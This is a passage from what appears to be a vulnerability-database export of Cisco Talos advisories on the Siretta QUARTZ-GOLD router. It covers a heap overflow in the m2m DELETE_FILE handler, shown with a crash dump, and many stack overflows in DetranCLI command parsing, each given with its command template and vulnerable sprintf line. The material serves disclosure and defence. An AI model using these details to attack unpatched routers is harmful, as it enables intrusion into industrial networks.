current_entry_off); [3]\n [...]\n \n\nFollowing whe will briefly explain the packet composition for this command:\n \n \n struct M2M_data_entry{\n uint16_t fix_word;\n uint16_t data_len;\n char data[];\n };\n \n struct M2M_packet{\n uint16_t packet_len;\n uint16_t cmd_id;\n uint32_t pkd_id;\n uint16_t version;\n M2M_data_entry entries[];\n };\n \n\nThe UDP packet received, which can contain at most 0x251c bytes, is casted to an `M2M_packet`. This is a variable length structure. Indeed, inside of it there is an array of `M2M_data_entry` structure that is a variable length struct. To seek the various entries the variable `current_entry_off` is used. It starts with value 0 and then, at `[4]`, the value `M2M_data_entry.data_len` of the just-parsed entry is added to seek, in the next loop, the next entry.\n\nThe `DELETE_FILE` command will execute the command `rm -rf <base_folder>/<M2M_data_entry.data> &` for each entry in the UDP `M2M_packet` packet it received.\n\nAt `[1]` several checks are performed. One related to the entry size is particular interesting: `(((actual_data_len_recv - 0x22) - current_entry_off) < current_data_len)` where `actual_data_len_recv` is the total size of the UDP packet that the service received, and `current_data_len` is the current data entry length. Basically, this checks if the total size of the received packet minus the header (0x22 bytes) minus the `current_entry_off` is lower than the `current_data_len`. If true, the packet is invalid; otherwise a string is allocated.\n\nThe string is allocated as follow: `calloc(current_data_len + base_folder_length + 0xc,1)`. It takes into account the `base_folder` length, the `M2M_data_entry.data_len` length of the current entry and the other characters in the format string.\n\nThe execution will reach `[2]` and compose the command that will then be executed. The problem is that the allocation takes into account the size provided, but then the composition of the string will use the string until the first null byte. So if the provided size is lower than the actual `M2M_data_entry.data` string size, a heap-based buffer overflow would occur.\n\n### Crash Information\n \n \n \u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $r0 : 0x00093ff8 \u2192 0x41414141 (\"AAAA\"?)\n $r1 : 0x7ee94168 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n $r2 : 0x14d\n $r3 : 0x41414141 (\"AAAA\"?)\n $r4 : 0x41414141 (\"AAAA\"?)\n $r5 : 0x41414141 (\"AAAA\"?)\n $r6 : 0x7ee932b2 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n $r7 : 0x1000\n $r8 : 0x0\n $r9 : 0x7ee931c8 \u2192 0x7e0000d0\n $r10 : 0xd\n $r11 : 0x0\n $r12 : 0x41414141 (\"AAAA\"?)\n $sp : 0x7ee93018 \u2192 0x7ee931c8 \u2192 0x7e0000d0\n $lr : 0x41414141 (\"AAAA\"?)\n $pc : 0x2acb5bfc \u2192 stmia r0!, {r3, r4, r5, r12}\n $cpsr: [negative zero CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ee93018\u2502+0x0000: 0x7ee931c8 \u2192 0x7e0000d0 \u2190 $sp\n 0x7ee9301c\u2502+0x0004: 0x00001000\n 0x7ee93020\u2502+0x0008: 0x00093155 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7ee93024\u2502+0x000c: 0x2acaf35c \u2192 <__stdio_fwrite+72> ldr r3, [r4, #16]\n 0x7ee93028\u2502+0x0010: 0x00001000\n 0x7ee9302c\u2502+0x0014: 0x0000000b\n 0x7ee93030\u2502+0x0018: 0x7ee932b2 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n 0x7ee93034\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n 0x2acb5bf0 orr r5, r5, r12, lsl #24\n 0x2acb5bf4 lsr r12, r12, #8\n 0x2acb5bf8 orr r12, r12, lr, lsl #24\n \u2192 0x2acb5bfc stmia r0!, {r3, r4, r5, r12}\n 0x2acb5c00 subs r2, r2, #16\n 0x2acb5c04 bge 0x2acb5bd8\n 0x2acb5c08 pop {r4, r5}\n 0x2acb5c0c adds r2, r2, #12\n 0x2acb5c10 blt 0x2acb5c2c\n \u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"m2m\", stopped 0x2acb5bfc in ?? (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n [#0] 0x2acb5bfc \u2192 stmia r0!, {r3, r4, r5, r12}\n \n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1638\n\nPrevious Report\n\nTALOS-2022-1613\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD m2m DELETE_FILE cmd heap-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41991"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1639", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1613\n\n## Siretta QUARTZ-GOLD DetranCLI command parsing stack-based buffer overflow vulnerabilities\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40992,CVE-2022-41018,CVE-2022-41005,CVE-2022-41028,CVE-2022-40990,CVE-2022-40985,CVE-2022-40989,CVE-2022-40991,CVE-2022-40994,CVE-2022-41002,CVE-2022-41012,CVE-2022-41019,CVE-2022-41030,CVE-2022-41011,CVE-2022-41027,CVE-2022-40986,CVE-2022-41007,CVE-2022-41022,CVE-2022-41020,CVE-2022-40995,CVE-2022-40998,CVE-2022-41001,CVE-2022-41006,CVE-2022-41014,CVE-2022-41029,CVE-2022-41010,CVE-2022-40997,CVE-2022-40996,CVE-2022-41016,CVE-2022-40988,CVE-2022-41017,CVE-2022-41004,CVE-2022-41013,CVE-2022-41000,CVE-2022-40999,CVE-2022-41025,CVE-2022-41008,CVE-2022-41015,CVE-2022-41026,CVE-2022-41024,CVE-2022-41009,CVE-2022-41003,CVE-2022-40993,CVE-2022-41021,CVE-2022-40987,CVE-2022-41023\n\n##### SUMMARY\n\nSeveral stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router offers a customized router console by the `DetranCLI` binary. From this CLI interface, it is possible to use several functionalities. Many functionalities have a parsing pattern that is vulnerable to stack-based buffer overflow.\n\nThis pattern looks like: `sprintf(stack_buffer, format_string, command_parameter_1, ...)`. The problem is that, in many functions, the `command_parameter_X`\u2019s size is not checked to take into account the size of `stack_buffer`, which can lead to stack-based buffer overflow.\n\nThe `DetranCLI` binary uses command template for each command. Following the relevant template special keyword:\n\n * `WORD` This is a parameter with any sequence of printable characters\n * `CODE` This parameter is similar to `WORD`\n * `A.B.C.D` This parameter represents an IP address\n * `<min_value-max_value>` This is a numerical parameter with a range of possible values, from `min_value` to `max_value`\n * `(choice1|choice2....)` This is a parameter with a set of possible values. The value can be another special keyword, like `WORD` or `<min_value-max_value>`\n\nEach of the above special keyword is going to fill the `char**` array provided as second parameter on each command function. From this point this second argument parameter will be called `argv`. Each special keyword will be inserted in `argv` progressively. For example, for the command:\n \n \n firmwall keyword WORD description (WORD|null)\n \n\nThis function will have as `argv[0]` a sequence of character, and as `argv[1]` either any sequence of characters or the string \u2018null\u2019.\n\nFollowing is the list of vulnerable commands with its details.\n\n#### CVE-2022-40985 - ddnsX hostname\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n (ddns1|ddns2) hostname WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x200,\"%s<%s:%s<%s<%s<%s<%s<%s\",\"\",\"\",\"\",argv[1],\"0\",\"\",\"0\",\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40986 - ddnsX mx\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n (ddns1|ddns2) mx WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x200,\"%s<%s:%s<%s<%s<%s<%s<%s\",\"\",\"\",\"\",\"\",\"0\",argv[1],\"0\",\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40987 - ddnsX username\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n (ddns1|ddns2) username WORD password CODE\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x200,\"%s<%s:%s<%s<%s<%s<%s<%s\",\"\",argv[1],argv[2],\"\",\"0\",\"\",\"0\",\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40988 - ipv6 static dns\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n ipv6 static dns WORD WORD WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_260,\"%s %s %s\",*argv,argv[1],argv[2]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40989 - bandwidth\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n bandwidth WORD dlrate <1-9999> dlceil <1-9999> ulrate <1-9999> ulceil <1-9999> priority (highest|high|normal|low|lowest)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%s<%s<%s<%s<%s<%d<0<0\",*argv,argv[1],argv[2],argv[3],argv[4],based_on_argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40990 - no bandwidth\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no bandwidth WORD dlrate <1-9999> dlceil <1-9999> ulrate <1-9999> ulceil <1-9999> priority (highest|high|normal|low|lowest)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%s<%s<%s<%s<%s<%d<0<0\",*argv,argv[1],argv[2],argv[3],argv[4],based_on_argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40991 - firmwall domain\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n firmwall domain WORD description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s\",1,*argv,argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40992 - no firmwall domain\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no firmwall domain WORD description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(stack_0x80,\"%d<%s<%s\",1,*argv,argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40993 - firmwall keyword\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n firmwall keyword WORD description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s\",1,*argv,argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40994 - no firmwall keyword\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no firmwall keyword WORD description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s\",1,*argv,argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40995 - firmwall srcmac\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n firmwall srcmac (WORD|null) srcip (A.B.C.D|null) dstip (A.B.C.D|null) protocol (none|tcp|udp|icmp) srcport (<1-65535>|null) dstport (<1-65535>|null) policy (drop|accept) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%s<%d<%s<%s<%d<%s>\",1,*argv,argv[1],argv[2],depentent_on_argv[3],argv[4],argv[5],iVar6,argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40996 - no firmwall srcmac\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no firmwall srcmac (WORD|null) srcip (A.B.C.D|null) dstip (A.B.C.D|null) protocol (none|tcp|udp|icmp) srcport (<1-65535>|null) dstport (<1-65535>|null) policy (drop|accept) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%s<%d<%s<%s<%d<%s\",1,*argv,argv[1],argv[2],depentent_on_argv[3],argv[4],argv[5],depentent_on_argv[6],argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40997 - gre index\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n gre index <1-8> destination A.B.C.D/M description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%s>\",1,*argv,argv[1],argv[2]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40998 - no gre index\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no gre index <1-8> destination A.B.C.D/M description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%s\",1,*argv,argv[1],argv[2]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-40999 - gre index with keepalive\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n gre index <1-8> tunnel A.B.C.D source (A.B.C.D|null) dest A.B.C.D keepalive (on|off) interval (<0-255>|null) retry (<0-255>|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%s<%s<%d<%s<%s<%s>\",1,*argv,argv[1],argv[2],argv[3],dependent_on_argv[4],argv[5],argv[6],argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41000 - no gre index with keepalive\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no gre index <1-8> tunnel A.B.C.D source (A.B.C.D|null) dest A.B.C.D keepalive (on|off) interval (<0-255>|null) retry (<0-255>|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%s<%s<%d<%s<%s<%s\",1,*argv,argv[1],argv[2],argv[3],dependent_on_argv[4],argv[5],argv[6],argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41001 - icmp check link\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n icmp check link WORD destination WORD interval <1-255> retries <1-255> description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%d<%d<%s\",1,*argv,argv[1],atoi_argv_2,atoi_argv[3],argv[4]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41002 - no icmp check link\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no icmp check link WORD destination WORD interval <1-255> retries <1-255> description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%s<%s<%d<%d<%s\",1,*argv,argv[1],atoi_argv[2],atoi_argv[3],argv[4]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41003 - ip nat outside source\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n ip nat outside source (udp|tcp|all) (WORD|null) WORD to A.B.C.D (WORD|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%d<%s<%s<%s<%s<%s\",1,based_on_argv[0],argv[1],argv[2],argv[4],argv[3],argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41004 - no ip nat outside source\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no ip nat outside source (udp|tcp|all) (WORD|null) WORD to A.B.C.D (WORD|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x40,\"%d<%d<%s<%s<%s<%s<%s\",1,based_on_argv[0],argv[1],argv[2],argv[4],argv[3],argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41005 - ip static route\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n ip static route destination A.B.C.D gateway A.B.C.D mask A.B.C.D metric <0-10> interface (lan|wan|vpn) description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%s<%s<%s<%s<%s<%s\",*argv,argv[1],argv[2],argv[3],argv[4],argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41006 - no ip static route\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no ip static route destination A.B.C.D gateway A.B.C.D mask A.B.C.D metric <0-10> interface (lan|wan|vpn) description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%s<%s<%s<%s<%s<%s\",*argv,argv[1],argv[2],argv[3],argv[4],argv[5]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41007 - port redirect protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n port redirect protocol (tcp|udp|tcp/udp) inport <1-65535> dstaddr A.B.C.D export <1-65535> description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%d<%s<%s<%s<%s>\",1,based_on_argv[0],atoi_argv[1],argv[2],atoi_argv[3],argv[4]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41008 - no port redirect protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no port redirect protocol (tcp|udp|tcp/udp) inport <1-65535> dstaddr A.B.C.D export <1-65535> description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%d<%s<%s<%s<%s\",1,based_on_argv[0],atoi_argv[1],argv[2],atoi_argv[3],argv[4]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41009 - port triger protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n port triger protocol (tcp|udp|tcp/udp) triger port <1-65535> forward port <1-65535> description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%d<%s<%s<%s>\",1,based_on_argv[0],atoi_argv[1],atoi_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41010 - no port triger protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no port triger protocol (tcp|udp|tcp/udp) triger port <1-65535> forward port <1-65535> description WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x80,\"%d<%d<%s<%s<%s\",1,based_on_argv[0],atoi_argv[1],atoi_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41011 - schedule link1\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n schedule link1 WORD link2 WORD policy (failover|backup) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%d<%s\",1,*argv,argv[1],dependent_on_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41012 - no schedule link1\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no schedule link1 WORD link2 WORD policy (failover|backup) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%d<%s\",1,*argv,argv[1],dependent_on_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41013 - static dhcp mac\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n static dhcp mac WORD (WORD|null) ip A.B.C.D hostname (WORD|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n if (*argv[1] == '\\x00'){\n format_string = \"%s%s<%s<%s<%s\";\n }\n else{\n format_string = \"%s,%s<%s<%s<%s\";\n } \n sprintf(buff_0x40,format_string,*argv,argv[1],argv[2],argv[3],argv[4]); \n \n\n#### CVE-2022-41014 - no static dhcp mac\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no static dhcp mac WORD (WORD|null) ip A.B.C.D hostname (WORD|null) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n if (*argv[1] == '\\x00'){\n format_string = \"%s%s<%s<%s<%s\";\n }\n else{\n format_string = \"%s,%s<%s<%s<%s\";\n } \n sprintf(buff_0x40,format_string,*argv,argv[1],argv[2],argv[3],argv[4]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41015 - vpn basic protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn basic protocol (l2tp|pptp) name WORD server WORD username WORD passsword WORD firmwall (on|off) defroute (on|off)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%d<%s<%s<%s<%s<%d<%d<%s\",1,based_on_argv[0],argv[1],argv[2],argv[3],argv[4],based_on_argv[5],based_on_argv[6],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41016 - no vpn basic protocol\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn basic protocol (l2tp|pptp) name WORD server WORD username WORD passsword WORD firmwall (on|off) defroute (on|off)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%d<%s<%s<%s<%s<%d<%d<%s\",1,based_on_argv[0],argv[1],argv[2],argv[3],argv[4],based_on_argv[5],based_on_argv[6],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41017 - vpn basic protocol with localip\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn basic protocol (l2tp|pptp) name WORD server WORD username WORD passsword WORD firmwall (on|off) defroute (on|off) localip A.B.C.D\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%d<%s<%s<%s<%s<%d<%d<%s\",1,based_on_argv[0],argv[1],argv[2],argv[3],argv[4],based_on_argv[5],based_on_argv[6],argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41018 - no vpn basic protocol with localip\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn basic protocol (l2tp|pptp) name WORD server WORD username WORD passsword WORD firmwall (on|off) defroute (on|off) localip A.B.C.D\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%d<%s<%s<%s<%s<%d<%d<%s\",1,based_on_argv[0],argv[1],argv[2],argv[3],argv[4],based_on_argv[5],based_on_argv[6],argv[7]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41019 - vpn l2tp advanced name\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn l2tp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> auth (on|off) password (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%s<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41020 - no vpn l2tp advanced name\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn l2tp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> auth (on|off) password (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%s<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41021 - vpn l2tp advanced name with options\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn l2tp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> auth (on|off) password (WORD|null) options WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%s<%s\",1,*argv,based_on_argv[1],atoi_argv[2],argv[3],based_on_argv[4],argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41022 - no vpn l2tp advanced name with options\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn l2tp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> auth (on|off) password (WORD|null) options WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%s<%s\",1,*argv,based_on_argv[1],atoi_argv[2],argv[3],based_on_argv[4],argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41023 - vpn pptp advanced name\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn pptp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> mppe (on|off) stateful (on|off)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%d<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],based_on_argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41024 - no vpn pptp advanced name\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn pptp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> mppe (on|off) stateful (on|off)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%d<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],based_on_argv[5],\"\");\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41025 - vpn pptp advanced name with options\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n vpn pptp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> mppe (on|off) stateful (on|off) options WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%d<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],based_on_argv[5],argv[6]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41026 - no vpn pptp advanced name with options\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn pptp advanced name WORD dns (yes|no) mtu <128-16384> mru <128-16384> mppe (on|off) stateful (on|off) options WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%d<%s<%s<%d<%d<%s\",1,*argv,based_on_argv[1],argv[2],argv[3],based_on_argv[4],based_on_argv[5],argv[6]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41027 - vpn schedule name1\n\nThis 